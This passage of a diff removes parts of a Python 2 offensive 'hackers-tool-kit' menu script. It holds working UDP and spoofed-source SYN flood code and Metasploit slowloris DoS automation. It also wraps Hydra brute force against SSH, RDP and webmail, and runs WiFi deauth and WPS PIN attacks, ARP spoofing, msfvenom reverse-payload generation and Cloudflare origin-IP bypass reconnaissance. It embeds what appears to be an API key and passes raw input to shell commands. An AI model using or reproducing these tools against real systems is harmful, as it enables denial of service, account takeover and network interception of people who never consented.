more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - 